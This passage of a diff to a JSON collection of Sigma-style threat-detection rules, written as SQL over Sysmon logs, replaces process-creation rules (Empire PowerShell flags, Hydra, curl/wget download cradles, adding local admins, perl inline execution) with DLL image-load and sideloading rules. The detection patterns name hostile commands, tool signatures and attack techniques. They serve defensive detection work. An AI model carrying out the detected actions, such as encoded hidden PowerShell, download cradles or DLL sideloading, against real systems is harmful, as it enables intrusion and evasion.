Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "status": "experimental", + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ - "Network administrator computer" + "Unikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Suspicious RASdial Activity", - "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", "status": "test", - "description": "Detects suspicious process related to rasdial.exe", - "author": "juju4", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", "attack.execution", - 
"attack.t1059" + "attack.t1204.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%rasdial.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rasdial_execution.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "Add User to Local Administrators Group", - "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "status": "experimental", - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "WMIC Loading Scripting Libraries", + "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "status": "test", + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1220" ], "falsepositives": [ - "Administrative activity" + "The command wmic os get lastboottuptime loads 
vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" }, { - "title": "Suspicious Msiexec Quiet Install", - "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", + "title": "Potential DLL Sideloading Via JsSchHlp", + "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_install_quiet.yml" + "filename": "image_load_side_load_jsschhlp.yml" }, { - "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", - "id": "01c42d3c-242d-4655-85b2-34f1739632f7", - "status": "experimental", - "description": "Detects usage of Dsacls to grant over permissive permissions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "status": "test", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic 
within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.execution", - "attack.t1218" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" ], "falsepositives": [ - "Legitimate administrators granting over permissive permissions to users" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsacls_abuse_permissions.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Permission Check Via Accesschk.EXE", - "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", - "status": "test", - "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": 
"48bfd177-7cf2-412b-ad77-baf923489e82", + "status": "experimental", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", - "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", "status": "experimental", - "description": 
"Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Administrative activity" + "Other DLLs with the same Imphash" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" ], - "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", - "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "UIPromptForCredentials DLLs", + "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "status": "experimental", + "description": "Detects potential use of UIPromptForCredentials 
functions by looking for some of the DLLs needed for it.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.credential_access", + "attack.collection", + "attack.t1056.002" ], "falsepositives": [ - "Unknown" + "Other legitimate processes loading those DLLs in your environment." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE 
'%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_uipromptforcreds_dlls.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", + "status": "experimental", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" 
], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "Perl Inline Command Execution", - "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", + "title": "Web Browsers DLL Sideloading", + "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", "status": "experimental", - "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_perl_inline_command_execution.yml" + "filename": "image_load_side_load_web_browsers.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing 
hack tool", - "author": "Vasiliy Burov", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Active Directory Kerberos DLL Loaded Via Office Application", + "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "status": "test", + "description": "Detects Kerberos DLL being loaded by an Office Product", + "author": "Antonlovesdnb", + "tags": [ + "attack.execution", + "attack.t1204.002" + ], "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "filename": "image_load_office_kerberos_dll_load.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Possible but rare" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": 
"image_load_side_load_shell_chrome_api.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Core DLL Loaded By Non PowerShell Process", + "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "status": "experimental", + "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.t1059.001", + "attack.execution" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (Image LIKE 
